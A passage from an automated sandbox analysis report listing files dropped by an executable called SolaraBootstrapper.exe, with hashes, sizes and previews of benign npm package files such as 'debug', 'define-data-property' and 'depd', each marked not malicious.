                                                  Encrypted:false
                                                  SSDEEP:24:S11clxHa5MNsrtxd7dNYeUPANZJW1kWmYWJUYUeL5r:Sf0xOhfdZNfUPA5W1kWcPUO
                                                  MD5:71A7656944FFE50CC27EBE02491AE49B
                                                  SHA1:8EBF0F80660D982FC68F00F82855696157E74B10
                                                  SHA-256:6C3D2C892DB282317913CE7C340DD2EDCCD326BCAFD18B644B8738144967D6EE
                                                  SHA-512:5B0010B41304E212A22D2C89EFF65CE410B000C71C4AB8C7FDBA8F549BA0629FE27F37C142058B041FB889BC73E00959AD58F673866EE7D29724687DA3C3F320
                                                  Malicious:false
                                                  Preview:{. "name": "debug",. "version": "2.6.9",. "repository": {. "type": "git",. "url": "git://github.com/visionmedia/debug.git". },. "description": "small debugging utility",. "keywords": [. "debug",. "log",. "debugger". ],. "author": "TJ Holowaychuk <tj@vision-media.ca>",. "contributors": [. "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io)",. "Andrew Rhyne <rhyneandrew@gmail.com>". ],. "license": "MIT",. "dependencies": {. "ms": "2.0.0". },. "devDependencies": {. "browserify": "9.0.3",. "chai": "^3.5.0",. "concurrently": "^3.1.0",. "coveralls": "^2.11.15",. "eslint": "^3.12.1",. "istanbul": "^0.4.5",. "karma": "^1.3.0",. "karma-chai": "^0.1.0",. "karma-mocha": "^1.3.0",. "karma-phantomjs-launcher": "^1.0.2",. "karma-sinon": "^1.0.5",. "mocha": "^3.2.0",. "mocha-lcov-reporter": "^1.2.0",. "rimraf": "^2.5.4",. "sinon": "^1.17.6",. "sinon-chai": "^2.8.0". },. "main": "./src/index.js",. "browser": "
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4734
                                                  Entropy (8bit):4.98143252477633
                                                  Encrypted:false
                                                  SSDEEP:96:Yl2YeMOqXjS+qBAyJN3spJaRCWqS9KynCYBPVQPVI8rxjpXTjjnZwEKlTDDFanP/:EHX2+FyisIWznCwPVQPVIIlpDjjnZwju
                                                  MD5:62CFEE6D6DD5FFEC5D3ED35073791AEC
                                                  SHA1:C41ADC79487F377D3DFB397C531812FB9CC429A2
                                                  SHA-256:0144AB6A52B9330C567DE11A5C3A4AEA35CDAC47A4C106482AA24AE8054CDC6F
                                                  SHA-512:920AEA250D98E29E8005EF0185DF5E34BC426D321785DF07CBABACE60BDBCFC6C92E2FF0C9F226A54925D2C7D595035EFEABABC935C7F1A4C704E7A7EF641339
                                                  Malicious:false
                                                  Preview:/**. * This is the web browser implementation of `debug()`.. *. * Expose `debug()` as the module.. */..exports = module.exports = require('./debug');.exports.log = log;.exports.formatArgs = formatArgs;.exports.save = save;.exports.load = load;.exports.useColors = useColors;.exports.storage = 'undefined' != typeof chrome. && 'undefined' != typeof chrome.storage. ? chrome.storage.local. : localstorage();../**. * Colors.. */..exports.colors = [. 'lightseagreen',. 'forestgreen',. 'goldenrod',. 'dodgerblue',. 'darkorchid',. 'crimson'.];../**. * Currently only WebKit-based Web Inspectors, Firefox >= v31,. * and the Firebug extension (any Firefox version) are known. * to support "%c" CSS customizations.. *. * TODO: add a `localStorage` variable to explicitly enable/disable colors. */..function useColors() {. // NB: In an Electron preload script, document will be defined but not fully. // initialized. Since we know we're in Chrome, we'll
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4394
                                                  Entropy (8bit):4.818652396947732
                                                  Encrypted:false
                                                  SSDEEP:96:TlGI0EEQUGReeJ57vPukDprmTC70WWnuOV123LwdVVktI15wHlL6ci6:JR7Jprp70JX23KVVkWsHZ06
                                                  MD5:74BDCCF347345D27FE8A4AC3ADD99C60
                                                  SHA1:A2B8A915C86FC750F56A7137860F19EC1182EE21
                                                  SHA-256:D8D1C1D6C387AB67C3F28D78FD0B20B9BECD69442DB9D3EFE110CA464B509C8A
                                                  SHA-512:C2D47EFEE2A4442BE6375D623F46B4C7EE9552C132B9229EB284BDD98629EDD02664167805B0AF9B3FAAA9B1906E9ED0C5E383396D4995CEF7051F9A450E1B99
                                                  Malicious:false
                                                  Preview:./**. * This is the common logic for both the Node.js and web browser. * implementations of `debug()`.. *. * Expose `debug()` as the module.. */..exports = module.exports = createDebug.debug = createDebug['default'] = createDebug;.exports.coerce = coerce;.exports.disable = disable;.exports.enable = enable;.exports.enabled = enabled;.exports.humanize = require('ms');../**. * The currently active debug mode names, and names to skip.. */..exports.names = [];.exports.skips = [];../**. * Map of special "%n" handling functions, for the debug "format" argument.. *. * Valid key names are a single, lower or upper-case letter, i.e. "n" and "N".. */..exports.formatters = {};../**. * Previous log timestamp.. */..var prevTime;../**. * Select a color.. * @param {String} namespace. * @return {Number}. * @api private. */..function selectColor(namespace) {. var hash = 0, i;.. for (i in namespace) {. hash = ((hash << 5) - hash) + namespace.charCodeAt(i);. hash |= 0; // Convert to 32bit integer.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):263
                                                  Entropy (8bit):4.632071401695598
                                                  Encrypted:false
                                                  SSDEEP:3:UV9WQYXu2CXK/FzGXMC4dF2PvbhEAS30vaFAVhVEE71ADKL5DVg6VAi1LKLkyBbb:U+DX74LNSkvaFwDEEtU6nsLZBf3bjBOY
                                                  MD5:DD13897EA2EED92695BB7E4E744A9148
                                                  SHA1:182314D32E789E4F9C29E3150AE392F1630F171C
                                                  SHA-256:9A34FEDEB2D269C46ED94E6F13039EB0D16D866DD460EC66FA3ACD78122FA9FE
                                                  SHA-512:0B53BC984178336AC516601E72D477D2BEEEF6936800DA17D3A79C153E0036F7428517EBD75D296729F65856C7E07749029F5AA192B2AC071EFC4D3E39750A32
                                                  Malicious:false
                                                  Preview:/**. * Detect Electron renderer process, which is node, but we should. * treat as a browser.. */..if (typeof process !== 'undefined' && process.type === 'renderer') {. module.exports = require('./browser.js');.} else {. module.exports = require('./node.js');.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):373
                                                  Entropy (8bit):4.732381821992279
                                                  Encrypted:false
                                                  SSDEEP:6:xBBzsUKU2aEmL3L3MHOMcGLuGIOWA9zFtqMKKb1dCWB6kmG7TNXxn:xBBgARbDL3GF/ut/G6q1L4Ux
                                                  MD5:B22697B673C7C3586F22AE0206258FDE
                                                  SHA1:B2F2996B1F38B6CEC0B1746BE6CFE458F2585EAC
                                                  SHA-256:949AE67EC1B655694F83DCE57D47D9D77234F9E7D698616932A90E69C7AFEE91
                                                  SHA-512:4FFD89DBC519A1F6C2F56A1B26F1AAD445DF8D5096DA1453645DBB67DC58B17AE9143906357CA4AF60059740C3BA34F7233049652B805D1AFED3FD206CD55A0C
                                                  Malicious:false
                                                  Preview:module.exports = inspectorLog;..// black hole.const nullStream = new (require('stream').Writable)();.nullStream._write = () => {};../**. * Outputs a `console.log()` to the Node.js Inspector console *only*.. */.function inspectorLog() {. const stdout = console._stdout;. console._stdout = nullStream;. console.log.apply(console, arguments);. console._stdout = stdout;.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6015
                                                  Entropy (8bit):4.983354444087808
                                                  Encrypted:false
                                                  SSDEEP:96:2l2OYeMOqXfMWj7/UZIjh7X7QcYX82ue1jGVLE9RlbME6tCUXXuVTtAH1ReKLGH/:WAX3tJ7nYMu1jGVLE9RlbDECQoTtAHbC
                                                  MD5:25807A97FBB1FCC42A013ABC7D7768C4
                                                  SHA1:F24D52CBC9144B011DEF218234FF7B50E7DDCB19
                                                  SHA-256:A3E83594A4CE88997E2E4FC66BC942B17B9D736290AD62560C7F09D6D0989AD0
                                                  SHA-512:8D316B63700126D7C8965A886E9B35A332D3F7E68D28F2264D235C0AFAD28066F877F25821E1983DDDE5F2D5052716CC73338779B41B6F4D1B90AD33DC3E9F24
                                                  Malicious:false
                                                  Preview:/**. * Module dependencies.. */..var tty = require('tty');.var util = require('util');../**. * This is the Node.js implementation of `debug()`.. *. * Expose `debug()` as the module.. */..exports = module.exports = require('./debug');.exports.init = init;.exports.log = log;.exports.formatArgs = formatArgs;.exports.save = save;.exports.load = load;.exports.useColors = useColors;../**. * Colors.. */..exports.colors = [6, 2, 3, 4, 5, 1];../**. * Build up the default `inspectOpts` object from the environment variables.. *. * $ DEBUG_COLORS=no DEBUG_DEPTH=10 DEBUG_SHOW_HIDDEN=enabled node script.js. */..exports.inspectOpts = Object.keys(process.env).filter(function (key) {. return /^debug_/i.test(key);.}).reduce(function (obj, key) {. // camel-case. var prop = key. .substring(6). .toLowerCase(). .replace(/_([a-z])/g, function (_, k) { return k.toUpperCase() });.. // coerce string value into JS value. var val = process.env[key];. if (/^(yes|on|true|enabled)$/i.test(val)) val
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):291
                                                  Entropy (8bit):4.630410182748324
                                                  Encrypted:false
                                                  SSDEEP:6:ExL0UxNSHGsHEL2pLL83sDlJbupsgAxxNHHWBs9QNSVLSIEsms4A:ErxNUkqlAuJSAxNHH2NHIUsX
                                                  MD5:B3C9F2A7A4953F9012AAED328A8FBC0D
                                                  SHA1:756B20295739F5031D17DE42E66D4EE5F61CDFAD
                                                  SHA-256:500A324DB044702F9DF2AAE5901A2BB474F31424A06C580373C9C766B3F897E1
                                                  SHA-512:C4AB5438E1692FFA74833B057514D37210AF346BF0C1761259BA6CF27F171B9A3580C17D30A6A8332FF62401FC3CF31FD47723910286D3563A5008BEBE39C6C2
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."complexity": 0,..."id-length": 0,..."new-cap": ["error", {...."capIsNewExceptions": [....."GetIntrinsic",....],...}],..},..."overrides": [...{...."files": "test/**",...."rules": {....."max-lines-per-function": "off",....},...},..],.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):591
                                                  Entropy (8bit):4.70311007120714
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMKAflgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgn8lg7g1GegJ9gEz4D
                                                  MD5:E8DD0B9176D957930C0960CDE3F872EB
                                                  SHA1:E121426BD6188CC578BC0369CEAA981C1D39B027
                                                  SHA-256:DF75ED2445C3BD41CD33A86E496F4EC7E279DAB92D1A01E0CF58C1AE2A675209
                                                  SHA-512:82315EC7AC1B6207834BDA2E509A4D03BD9E8043336AAB92AC1CF620815DA7FC19016F4F1AF3D6F906B4056815CC83D5C7A85453DF0ABD13640A71A98E13C616
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/define-data-property.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):216
                                                  Entropy (8bit):4.771900676344982
                                                  Encrypted:false
                                                  SSDEEP:6:Kw9OfyFdRaB9yq2TpR6S8U7XfUGUiMIOJHhBK:5O6FTaB9WTpR65U7cAMjJHe
                                                  MD5:C2AB942102236F987048D0D84D73D960
                                                  SHA1:95462172699187AC02EAEC6074024B26E6D71CFF
                                                  SHA-256:948366FEA3B423A46366326D0BB2E54B08ABD1CF0B243678BA6625740C40DA5A
                                                  SHA-512:E36B20C16CEEB090750F3865EFC8D7FD983AE4E8B41C30CC3865D2FD4925BF5902627E1F1ED46C0FF2453F076EF9DE34BE899EF57754B29CD158440071318479
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."lines": 86,.."statements": 85.93,.."functions": 82.43,.."branches": 76.06,.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5390
                                                  Entropy (8bit):5.287721000352198
                                                  Encrypted:false
                                                  SSDEEP:48:E5yEpdBPlfMkMIzncQY7pB09d2PbChEVwR6ozSex+GJ3M/HzAc6VVYcGvRd:E5yE3B9UI5epB0P+uPx+uC6VycGvRd
                                                  MD5:ABC731C24C31F7E21E82B3930B596C26
                                                  SHA1:C27E07B7E88045DC014F4FFC84FEFF4814344FE8
                                                  SHA-256:505CFF21A498C2186D643EBA46DAC80C6D71E25CEFAFF156E24DD2AFE29E8924
                                                  SHA-512:9B3006A24C328F3A2A062AA74D29D7CF4E1845DB42C2E64FF30D3EF09EBD5522B1C26034F7909B597762C4A440D3AC1D074FA7B05431401C9CD74DDBE1098BD3
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.1.4](https://github.com/ljharb/define-data-property/compare/v1.1.3...v1.1.4) - 2024-02-13..### Commits..- [Refactor] use `es-define-property` [`90f2f4c`](https://github.com/ljharb/define-data-property/commit/90f2f4cc20298401e71c28e1e08888db12021453).- [Dev Deps] update `@types/object.getownpropertydescriptors` [`cd929d9`](https://github.com/ljharb/define-data-property/commit/cd929d9a04f5f2fdcfa9d5be140940b91a083153)..## [v1.1.3](https://github.com/ljharb/define-data-property/compare/v1.1.2...v1.1.3) - 2024-02-12..### Commits..- [types] hand-write d.ts instead of emitting it [`0cbc988`](https://github.com/ljharb/define-data-property/commit/0cbc988203c105f2d97948327c7167ebd33bd318).- [meta] simplify `exports` [`690781e`](https://gith
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.101229758424099
                                                  Encrypted:false
                                                  SSDEEP:24:iPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:UsaJHlxE3dQHOs5exm3ogFh
                                                  MD5:06AAE85028F50BA69E6F83B6C9402B26
                                                  SHA1:0F6716ABCA917739D03B6BCD1B17C9D27FAE3141
                                                  SHA-256:B41D08BC3624D8C436FC80237D73EBB361985A67F4504BBCD703E5CA2B27254C
                                                  SHA-512:F420962873B201CA1B413F9F3ED9A2AB6176FB192B2160FEE0C42C8690396A010629D2C0FA3090DCBA4E7FB2AA5364E6AF32DAF00A2870C78EB3EFC0C66A6205
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2023 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2431
                                                  Entropy (8bit):5.044823356747143
                                                  Encrypted:false
                                                  SSDEEP:48:B1eI4I7qlMwcTNmAnMnn5KlK5c0Wc6FsJIL0IRIDv:LXFelMvTnMnn5KlK5c1Lxuz
                                                  MD5:E1B5204A9C537870BB43DF7C59903F59
                                                  SHA1:DCD48565637E619379E97FCF5E5DAB8C15A41F28
                                                  SHA-256:72DDFA32F732F61479CFB34852CB0F57162BC3037A97BF812C4E42679B3FF0B9
                                                  SHA-512:8737FD203C91CBEC368BD4F8C15E79987D3FB2A6C4C0F55C4643E5308D148FADFD3611C15C19139A8AB98685E50E4CF2D7D17FB043EC157A8561F259CA9369B7
                                                  Malicious:false
                                                  Preview:# define-data-property <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Define a data property on an object. Will fall back to assignment in an engine without descriptors...The three `non*` argument can also be passed `null`, which will use the existing state if available...The `loose` argument will mean that if you attempt to set a non-normal data property, in an environment without descriptor support, it will fall back to normal assignment...## Usage..```javascript.var defineDataProperty = require('define-data-property');.var assert = require('assert');..var obj = {};.defineDataProperty(obj, 'key', 'value');.defineDataProperty(..obj,..'key2',..'value',..true, // nonEnumerable, optional..false, // nonWritable, optional..true, // nonConfigurable, optional
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):315
                                                  Entropy (8bit):4.501953568827184
                                                  Encrypted:false
                                                  SSDEEP:6:X2o1DnvffMjRhAfAIH0jCJ5cH2fcJ5cH2hnvJ5cHzqjMRdiiEo2:X2o1DfUjRGbZcBcScTvdiiEo2
                                                  MD5:0D5B9889D2BB934DA5B34765E3B3910F
                                                  SHA1:8DFD551E6DC0EE2FFA8F9946F061957F85A9AB44
                                                  SHA-256:654404BEF397F9614F656D78D09C36D3EF38E005900CEA77C8BEACF0EE1E8F07
                                                  SHA-512:3FC87B252E2A626A6DD52EAA0776BD36C5C1C31CBAB581288509615C4FBBCD16C1B71D93687B8C0140B99047A73605CCC5C04870769A9C7BFEF67C45FCEB6CDE
                                                  Malicious:false
                                                  Preview:.declare function defineDataProperty(. obj: Record<PropertyKey, unknown>,. property: keyof typeof obj,. value: typeof obj[typeof property],. nonEnumerable?: boolean | null,. nonWritable?: boolean | null,. nonConfigurable?: boolean | null,. loose?: boolean.): void;..export = defineDataProperty;
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2336
                                                  Entropy (8bit):5.066283915153754
                                                  Encrypted:false
                                                  SSDEEP:48:zSBpOmcmZuYZye6iY4XS4+YuG+72c42itF6IrXWQhQzx2NOj4k:zqpNcmZublv78p0pAHhWIu
                                                  MD5:92D50385CB04E9BBA48103D21A4A08DD
                                                  SHA1:137BB6B7B4E8AEDE40825F23805CB8B8DC3EAB4E
                                                  SHA-256:E34746E8C69BBF6BA2182B7362E9C4DC5FB3C19CACE48091781AE967370BC065
                                                  SHA-512:DC291A9457CFFC5F6EB39694FD91C72877502829BEF01B07DAD5DF47A11751B2910E1807D52842FAD38D8B8309EB6D8207C042CE705A211866717695B6D6D1BE
                                                  Malicious:false
                                                  Preview:'use strict';..var $defineProperty = require('es-define-property');..var $SyntaxError = require('es-errors/syntax');.var $TypeError = require('es-errors/type');..var gopd = require('gopd');../** @type {import('.')} */.module.exports = function defineDataProperty(..obj,..property,..value.) {..if (!obj || (typeof obj !== 'object' && typeof obj !== 'function')) {...throw new $TypeError('`obj` must be an object or a function`');..}..if (typeof property !== 'string' && typeof property !== 'symbol') {...throw new $TypeError('`property` must be a string or a symbol`');..}..if (arguments.length > 3 && typeof arguments[3] !== 'boolean' && arguments[3] !== null) {...throw new $TypeError('`nonEnumerable`, if provided, must be a boolean or null');..}..if (arguments.length > 4 && typeof arguments[4] !== 'boolean' && arguments[4] !== null) {...throw new $TypeError('`nonWritable`, if provided, must be a boolean or null');..}..if (arguments.length > 5 && typeof arguments[5] !== 'boolean' && arguments[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2856
                                                  Entropy (8bit):5.098300314042864
                                                  Encrypted:false
                                                  SSDEEP:48:/OVkmRYCZUPagS4E0fSyRYsEg448rvsdl5yKQcbf4OS7yKBflmeSowVf4:yk1CSLI34QAkf0e6f4
                                                  MD5:05B9BA4536B59B74C4B3C95327787004
                                                  SHA1:C9384AA894159EE96E107CDD3002915849FC91FC
                                                  SHA-256:BDE7F1465B344A24DA2B10D2EE99F87EDF8E0ECD177C28370B60AD9595DE730E
                                                  SHA-512:4B81BBD31FD5DDCE528FB0EBCEFBBDA77891F124F7FAB9019C5FF1BDDDDAFBB679B5E3D131A94C02B495E47327985FA5ECC613F7A2A109E58F5994B358FC3B0E
                                                  Malicious:false
                                                  Preview:{.."name": "define-data-property",.."version": "1.1.4",.."description": "Define a data property on an object. Will fall back to assignment in an engine without descriptors.",.."main": "index.js",.."types": "./index.d.ts",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."tsc": "tsc -p .",..."prelint": "evalmd README.md",..."lint": "eslint --ext=js,mjs .",..."postlint": "npm run tsc",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository":
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):10471
                                                  Entropy (8bit):4.936553164721052
                                                  Encrypted:false
                                                  SSDEEP:192:OG6xzFuMZ/9p9wOZaOdqOZaOZpOZaqZSVEBxOZWOQ2OZDrZQXEXwc8OQ2OZDrZxu:OjbrwOZaOdqOZaOZpOZaqZSVEBxOZWOS
                                                  MD5:0D1FABE33CA02B061AE2420E62C46059
                                                  SHA1:B2BCAA3BAF27733B105784766E8A68D7394BE260
                                                  SHA-256:DB68BC8E54487D027C9699F4B6DF2DF865386DE6F2B738619C7C6431C919767D
                                                  SHA-512:4D5D626FDB0B3FCCC183896C7D74DC31070404BA6F311666CADFB3325FF2F07980D942BC7A59BC74CD3BEFF97C4C1FE2EE42846C2DA5AED3BD107FC78B96776D
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var v = require('es-value-fixtures');.var forEach = require('for-each');.var inspect = require('object-inspect');.var hasOwn = require('hasown');.var hasPropertyDescriptors = require('has-property-descriptors')();.var getOwnPropertyDescriptors = require('object.getownpropertydescriptors');.var ownKeys = require('reflect.ownkeys');..var defineDataProperty = require('../');..test('defineDataProperty', function (t) {..t.test('argument validation', function (st) {...forEach(v.primitives, function (nonObject) {....st['throws'](.....// @ts-expect-error.....function () { defineDataProperty(nonObject, 'key', 'value'); },.....TypeError,.....'throws on non-object input: ' + inspect(nonObject)....);...});....forEach(v.nonPropertyKeys, function (nonPropertyKey) {....st['throws'](.....// @ts-expect-error.....function () { defineDataProperty({}, nonPropertyKey, 'value'); },.....TypeError,.....'throws on non-PropertyKey input: ' + inspect(nonPropertyKey)....
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4883
                                                  Entropy (8bit):4.172078287396977
                                                  Encrypted:false
                                                  SSDEEP:48:x80urTY8LBtkyo/8iDloqIcofiBvLz5WHDo30TpGipPTlPM8CndZDHmIFgGneDw9:BaB28yoqKKUH0kwWx26fGnobNY8vG
                                                  MD5:A544F506AD2051F95D01D7F50D55A325
                                                  SHA1:D32C092355606EB003FCBFDE330DFF29B721F085
                                                  SHA-256:DF4B3B4BCC4F4A716F64EAA22530AD895E244489474D1583E866F5FD26EFE462
                                                  SHA-512:8A87769E2C4249226E8AAD658CC858D488CC7D3029E5F6BF81683B701B30185E65D2D014400912D8CA68149E11FC957D56428A34F5DB07A96D5A6F17512A2853
                                                  Malicious:false
                                                  Preview:{. "compilerOptions": {. /* Visit https://aka.ms/tsconfig to read more about this file */.. /* Projects */.. /* Language and Environment */. "target": "es2022", /* Set the JavaScript language version for emitted JavaScript and include compatible library declarations. */. // "lib": [], /* Specify a set of bundled library declaration files that describe the target runtime environment. */. // "noLib": true, /* Disable including any library files, including the default lib.d.ts. */. "useDefineForClassFields": true, /* Emit ECMAScript-standard-compliant class fields. */. // "moduleDetection": "auto", /* Control what method is used to detect module-format JS files. */.. /* Modules */. "module": "commonjs", /* Specify what module code is generated. */. // "rootDir": "./",
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2256
                                                  Entropy (8bit):4.872108132358601
                                                  Encrypted:false
                                                  SSDEEP:48:xKGtcLOw2ASadyecxIVkv6SHZ4OQfFrFnSFFYTStU6fAhZUf:xoLgxaUh6NsFC6Msf
                                                  MD5:0B39750CFDC98026919E4F2C3DCAE105
                                                  SHA1:5C540DDAA04F4314090D7FB74B552789F9591551
                                                  SHA-256:B6E94899B155A3F707694B8CED212E1B01F43D0953D89E1C5B718B3E5FB896FA
                                                  SHA-512:B9BC50183B3637F478CBB78B1D88FDAC76C296CDC73C8829610AC99C3168239E24226C82688458EDAD598725255E413F05B42DD7FA1A25F41B5D41AD95E7702D
                                                  Malicious:false
                                                  Preview:2.0.0 / 2018-10-26.==================.. * Drop support for Node.js 0.6. * Replace internal `eval` usage with `Function` constructor. * Use instance methods on `process` to check for listeners..1.1.2 / 2018-01-11.==================.. * perf: remove argument reassignment. * Support Node.js 0.6 to 9.x..1.1.1 / 2017-07-27.==================.. * Remove unnecessary `Buffer` loading. * Support Node.js 0.6 to 8.x..1.1.0 / 2015-09-14.==================.. * Enable strict mode in more places. * Support io.js 3.x. * Support io.js 2.x. * Support web browser loading. - Requires bundler like Browserify or webpack..1.0.1 / 2015-04-07.==================.. * Fix `TypeError`s when under `'use strict'` code. * Fix useless type name on auto-generated messages. * Support io.js 1.x. * Support Node.js 0.12..1.0.0 / 2014-09-17.==================.. * No changes..0.4.5 / 2014-09-09.==================.. * Improve call speed to functions using the function wrapper. * Support Node.js 0.6..0.4.4
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.1284116326456815
                                                  Encrypted:false
                                                  SSDEEP:24:NiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:NiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:EBC30494FD072DC98368DA73E1821715
                                                  SHA1:B1FC406040905BBDC79A2E9187BC58AA4BBE9774
                                                  SHA-256:BD134B41DA59E452FB5A1D366B660886F741C87C2BF9428E93764C419FBC40F5
                                                  SHA-512:175596609C91767A101D6B1051DE91563695B92245B5C4BD0A2BA4CC24EF28F0480EA2275878E566FC08D203D182545F7CC7EBFB08966CBA6BABED5112EDDBBD
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2018 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):9988
                                                  Entropy (8bit):4.803049496208353
                                                  Encrypted:false
                                                  SSDEEP:192:pC3g93tCl7wTGdJfXkSCbkIwtN49jTgokqtEnKwGqM0J5GcTYGphchGvna:KM960TGAS/IwtN49jTgoksEnKwq0J5M9
                                                  MD5:42D9D887A8CCE3B2AB9C8DA4FAED33E3
                                                  SHA1:DEE99FAB95A6441191C709B010BABB1A7015B575
                                                  SHA-256:11DEB26EAFA25A465FFB8A8E3C28195EB40E679FDA52B760132DBE9C9B21FB5C
                                                  SHA-512:D9B07553C1C5FC505732D1435B81ACCBFE5D164728FD0C7EA0E179582BC6F4FB9DA7047E119468E6431903DDA8564D4A26608CDFAB5E2F7344D2F56A25B021AD
                                                  Malicious:false
